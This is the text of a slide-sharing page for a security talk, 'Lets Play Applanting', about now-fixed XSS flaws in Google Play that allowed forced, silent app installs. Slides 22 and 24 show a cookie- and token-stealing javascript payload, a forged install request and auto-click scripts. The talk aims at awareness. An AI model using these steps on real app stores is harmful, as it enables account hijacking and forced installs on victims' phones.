lets play applanting
play

Lets Play Applanting... Ajit Hatti (Co-Founder) Null Open Security - PowerPoint PPT Presentation

Feb 18, 2023 •723 likes •1.1k views

Lets Play Applanting... Ajit Hatti (Co-Founder) Null Open Security Community HELLO From INDIA (Technically) Disclaimer Personal Research Personal Views Doesn't represents views of my Employer. Vulnerabilities discussed in the paper

  1. Lets Play Applanting... Ajit Hatti (Co-Founder) Null – Open Security Community

  2. HELLO From INDIA (Technically…)

  3. Disclaimer Personal Research Personal Views Doesn't represents views of my Employer. Vulnerabilities discussed in the paper are fixed by Google. .

  4. Who Am I? co- founder “ n|u - open security community” Working on Security of NetBackup Product family at Symantec Research on Critical Information Infrastructure Security.

  8. Thank you, Questions ? Can you hack Gmail/Facebook Account? Can you hack the banks and make big money?? 

  9. Let's Play - Applanting It involves both : 1. Hacking Gmail or a google account & 2. Then Hack the Bank Accounts to make money

  10. This Paper is About: design and gap in Google's Play store along with few XSS vulnerabilities discovered in late last year. Aimed : To create awareness about an interesting attack possibility called Applanting. Not Claims : success of the attack as Google has been very fast and better in fixing the security issues in their services Definetely Claims : Similar attacks in future on platform other than Android

  11. Motivations

  12. Bank Identifies you by your Phone

  13. Reliable and Cheaper alternative

  14. The Concern Your Phone Is your Identity

  15. Facebook Identifies you by your Phone & So dose Google services…

  16. Your Phone Is your Identity Mom, The man at the door says he is my dad, and his Mobile number is saved in your cell phone as “Rascal”, should I open the door?

  17. Motivations Lt. Col MS Dhoni, Planting Campaign

  18. The Play Ground

  19. The Rules

  20. Between the lines id=com.nullcon.android& offerType=1& device=g2ed6a8be00731246& xhr=1& token=QRnhw2PHSRv6icuuUn1z9wyEI_U%3A1354698436000

  21. Possible Moves: Steal the Cookie and then…..

  22. Possible Moves: l javascript:alert(initProps['userEmail'] + ' | ' + initProps['token'] + ' | ' + initProps['selectedDeviceId']) POST /store/install HTTP/1.1 Host: play.google.com Cookie: __utma=<cookie from XSS> Content-Type: application/x-www-form-urlencoded;charset=utf-8 Content-Length: 139 id=com.company.app_name&device=<19 digit phone ID>&xhr=1&token=<41 char token>

  23. The Flaw

  24. Possible Moves? Javascript: document.getElementById('Install').click(); OR $("a").click(); //by tag. $("a[href='#']").click(); //by tag with href property $(".side_link").click(); //by class $("div#someId a.side_link").click(); // This would work if the link was a child of a div with Id = someId

  25. The Goal

  26. Getting the Player to the Ground

  27. The Action

  28. What We Can do?

  29. What We Can Gain?

  30. What We Can Gain?

  31. Demonstration

  32. Big Thanks To Jon Oberheide (http://jon.oberheide.org/) Thomas Cannot (http://thomascannon.net/) Google

  33. Future of Applanting Man in mobile – very powerful exploitation Vector Applanting is about to start grow and be a Challenge The Challenge : As a third party, you cant differentiate between App installation by Choice or by Force

  34. Future of Applanting Applanting on Windows 8 based phones App-Forking -

  35. Conclusion Concerns : Mobile is your strongest Identity & single point to screw your life. Applanting : Flaws in App stores can be leveraged to install applications Silently. Challenge : Cant differentiate between user chosen application installation and Applanting. Awareness : Make sure you did installed that app on your mobile.

  36. Thank you All & Also BIG Thanks to Team Black Hat Vivek Ramchandran Lt. Col MS Dhoni, (Inspiring India) nullcon & Jailbreak team

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

The Duplicator-Spoiler (Ehrenfeucht-Fra ss e) Game for an Ordinal Number of Turns

The Duplicator-Spoiler (Ehrenfeucht-Fra ss e) Game for an Ordinal Number of Turns

The Duplicator-Spoiler (Ehrenfeucht-Fra ss e) Game for an Ordinal Number of Turns Gasarch, Pinkerton Lets Play a Game! Lets play G ( Q ; Z ). Q Rationals Z Integers Lets Play a Game! Lets play G ( Q ;

515 views • 27 slides
LET Development Rookie Members LETs INSPIRE Helping to grow the game LETs PLAY Helping

LET Development Rookie Members LETs INSPIRE Helping to grow the game LETs PLAY Helping

LET Development Rookie Members LETs INSPIRE Helping to grow the game LETs PLAY Helping young players to achieve their dreams LETs GET READY Helping players joining the tour for the first time DEVELOPMENT LETs LEARN STRATEGY

442 views • 10 slides
A SAND TRAY EXPERIENCE Carol Hinman, PhD, LMHC, CCMHC, RPT-S LETS PLAY LETS PROCESS

A SAND TRAY EXPERIENCE Carol Hinman, PhD, LMHC, CCMHC, RPT-S LETS PLAY LETS PROCESS

A SAND TRAY EXPERIENCE Carol Hinman, PhD, LMHC, CCMHC, RPT-S LETS PLAY LETS PROCESS WHERE DID THAT PULL COME FROM? Lowenfeld Jungian perspective Many perspectives or theories are being used with sandtray BASICS

392 views • 22 slides
LETS GET STARTED! LETS GET STARTED! Answer the question, win cool stuff! Question #1

LETS GET STARTED! LETS GET STARTED! Answer the question, win cool stuff! Question #1

LETS GET STARTED! LETS GET STARTED! Answer the question, win cool stuff! Question #1 Question #1 We work. You play. We work. You play. How many full-time people work for the Department of Recreation? 12 155 39 265 We

450 views • 30 slides
ONE BIG GOAL OF THE SEASON TOGETHER Lets create a positive environment for kids to play

ONE BIG GOAL OF THE SEASON TOGETHER Lets create a positive environment for kids to play

ONE BIG GOAL OF THE SEASON TOGETHER Lets create a positive environment for kids to play and learn basketball. What can we do? Sample pre-game speech approved by the League Offices of MISSION 5&amp;2 enjoy! Coach Norman Dale from

342 views • 12 slides
GAMIFICATION ICT TO PLAY AND PLAY TO LEARN PRESENTATION OF THE TRAINING COURSE FOR YOUTH

GAMIFICATION ICT TO PLAY AND PLAY TO LEARN PRESENTATION OF THE TRAINING COURSE FOR YOUTH

GAMIFICATION ICT TO PLAY AND PLAY TO LEARN PRESENTATION OF THE TRAINING COURSE FOR YOUTH WORKERS PRESENTATION OF THE PARTNERS AIDEJOVEN Alianza Internacional para el Desarrollo de los Jvenes, Spain Associazione Lets Keep

394 views • 17 slides
Action Social Mastery Achievement Immersion Creativity Boom! Lets Play Together

Action Social Mastery Achievement Immersion Creativity Boom! Lets Play Together

Action Social Mastery Achievement Immersion Creativity Boom! Lets Play Together Let Me Think I Want More Once Upon a Time What If? Destruction Competition Challenge Completion Fantasy Design Guns.

739 views • 60 slides
Action Social Mastery Achievement Immersion Creativity Boom! Lets Play Together

Action Social Mastery Achievement Immersion Creativity Boom! Lets Play Together

Action Social Mastery Achievement Immersion Creativity Boom! Lets Play Together Let Me Think I Want More Once Upon a Time What If? Destruction Competition Challenge Completion Fantasy Design Guns.

974 views • 39 slides
Lets Play with Vanilla Vim Note Been 3 months since I use vanilla vim for coding Ruby...

Lets Play with Vanilla Vim Note Been 3 months since I use vanilla vim for coding Ruby...

Lets Play with Vanilla Vim Note Been 3 months since I use vanilla vim for coding Ruby... Agenda Vim Way HJKL ADM-3A full keyboard. Modes Useful Navigation Navigating Inline search next for with pointer at Inline search previous for

557 views • 36 slides
Gaming On Ubuntu by iheartubuntu It's 2012 already. Lets play some games. Gaming in Ubuntu has

Gaming On Ubuntu by iheartubuntu It's 2012 already. Lets play some games. Gaming in Ubuntu has

Gaming On Ubuntu by iheartubuntu It's 2012 already. Lets play some games. Gaming in Ubuntu has come a long way. You no longer have to spend hours on the internet searching for games that work on Ubuntu. Nor do you need to learn distro

199 views • 9 slides
Market for Lemons Molho Johan Stennek 1 Lets play a game ! Game

Market for Lemons Molho Johan Stennek 1 Lets play a game ! Game

Market for Lemons Molho Johan Stennek 1 Lets play a game ! Game Half of all used cars are lemons Value to seller (current owner) = 0

963 views • 70 slides
Coalition games on interaction graphs Lets play with tree decompositions Nicolas Bousquet

Coalition games on interaction graphs Lets play with tree decompositions Nicolas Bousquet

Coalition games on interaction graphs Lets play with tree decompositions Nicolas Bousquet joint work with Zhentao Li and Adrian Vetta S eminaire Complex Networks 1/30 Context We want people to work together. 2/30 Context We

1k views • 82 slides
Emine rnek Schools Erasmus+ Project 2018-2020 Jouons aux langues et aux cultures

Emine rnek Schools Erasmus+ Project 2018-2020 Jouons aux langues et aux cultures

Emine rnek Schools Erasmus+ Project 2018-2020 Jouons aux langues et aux cultures Lets play culture, lets play CLIL OUR MISSION We aim to bring up active individuals: who can keep up with the process of

754 views • 49 slides
LETS PLAY! 100 99 98 97 96 O o p s , S o Salty just got a little u r P s u s

LETS PLAY! 100 99 98 97 96 O o p s , S o Salty just got a little u r P s u s

How to play: Each player puts their counter on the space that says 'START'. Take it in turns to roll the dice. Move your counter forward the number of spaces shown on the dice. If your counter lands at the bottom of a ladder, you can move up to

390 views • 5 slides
for Grads LETS PLAY A GAME TRUE FALSE Carrying a balance from month to month on my credit

for Grads LETS PLAY A GAME TRUE FALSE Carrying a balance from month to month on my credit

Financial Prep for Grads LETS PLAY A GAME TRUE FALSE Carrying a balance from month to month on my credit card will help my credit score. Having no credit is the same as having bad credit. Potential employers may use my credit report as

424 views • 20 slides
Sustainability From the GMMB Team Weve come a long way Now, lets help sustain our efforts

Sustainability From the GMMB Team Weve come a long way Now, lets help sustain our efforts

Storytelling for Sustainability From the GMMB Team Weve come a long way Now, lets help sustain our efforts Kids need 60 Kids need 60 minutes of play each minutes of play each day. Make sure your day. Check out the kids get outside

422 views • 18 slides
Course Introduction Hybrid Modeling Marco Chiarandini Department of Mathematics &amp; Computer

Course Introduction Hybrid Modeling Marco Chiarandini Department of Mathematics &amp; Computer

DM826 Spring 2012 Modeling and Solving Constrained Optimization Problems Lecture 1 Course Introduction Hybrid Modeling Marco Chiarandini Department of Mathematics &amp; Computer Science University of Southern Denmark [ Partly based on

1.05k views • 40 slides
LMS and GAMLSS Flexible Regression and Smoothing Mikis Stasinopoulos 1 and Bob Rigby 1 1

LMS and GAMLSS Flexible Regression and Smoothing Mikis Stasinopoulos 1 and Bob Rigby 1 1

LMS and GAMLSS LMS and GAMLSS Flexible Regression and Smoothing Mikis Stasinopoulos 1 and Bob Rigby 1 1 STORM/FLSC, London Metropolitan University Royal Statistical Society, February 2016 1 LMS and GAMLSS Outline 1 The Lambda, Mu and Sigma

4.14k views • 55 slides
26:010:557 / 26:620:557 Social Science Research Methods Dr. Peter R. Gillett Associate

26:010:557 / 26:620:557 Social Science Research Methods Dr. Peter R. Gillett Associate

26:010:557 / 26:620:557 Social Science Research Methods Dr. Peter R. Gillett Associate Professor Department of Accounting &amp; Information Systems Rutgers Business School Newark &amp; New Brunswick Dr. Peter R Gillett October 28, 2004

368 views • 22 slides
Advanced Simulation - Lecture 6 Patrick Rebeschini January 31th, 2018 Patrick Rebeschini

Advanced Simulation - Lecture 6 Patrick Rebeschini January 31th, 2018 Patrick Rebeschini

Advanced Simulation - Lecture 6 Patrick Rebeschini January 31th, 2018 Patrick Rebeschini Lecture 6 1/ 25 Markov chain Monte Carlo We are interested in sampling from a distribution , for instance a posterior distribution in a Bayesian

712 views • 25 slides
Proving Weakly Consistent Applications Correct Alexey Gotsman IMDEA Software Institute, Madrid,

Proving Weakly Consistent Applications Correct Alexey Gotsman IMDEA Software Institute, Madrid,

Proving Weakly Consistent Applications Correct Alexey Gotsman IMDEA Software Institute, Madrid, Spain Joint work with Hongseok Yang (Oxford), Carla Ferreira (U Nova Lisboa), Mahsa Najafzadeh, Marc Shapiro (INRIA) Eventually consistent

967 views • 51 slides
Brief Summary of European Neutrino Town Meeting CERN, Oct. 22-24 Peter Shanahan, Alan Bross SAC

Brief Summary of European Neutrino Town Meeting CERN, Oct. 22-24 Peter Shanahan, Alan Bross SAC

Brief Summary of European Neutrino Town Meeting CERN, Oct. 22-24 Peter Shanahan, Alan Bross SAC Meeting 29 Oct 2018 European Neutrino Town meeting and ESPP 2019 Discussion The European Strategy for Particle Physics is owned by the

305 views • 5 slides
Collapsing Ricci-flat metrics on K3 surfaces Jeff Viaclovsky University of California, Irvine

Collapsing Ricci-flat metrics on K3 surfaces Jeff Viaclovsky University of California, Irvine

Surfaces Moduli K3 surfaces Algebraic geometry Details Collapsing Ricci-flat metrics on K3 surfaces Jeff Viaclovsky University of California, Irvine June 27, 2018 Tokyo Institute of Technology Jeff Viaclovsky Collapsing Ricci-flat metrics

710 views • 50 slides
Round table presentation Takaaki Kajita ICRR, Univ of Tokyo Activities in Japan related to APPEC

Round table presentation Takaaki Kajita ICRR, Univ of Tokyo Activities in Japan related to APPEC

Round table presentation Takaaki Kajita ICRR, Univ of Tokyo Activities in Japan related to APPEC Super-Kamiokande has been contributing to neutrino oscillation physics for 20 years. Super-K is going to modify the detector (loading Gd) so

620 views • 5 slides

More recommend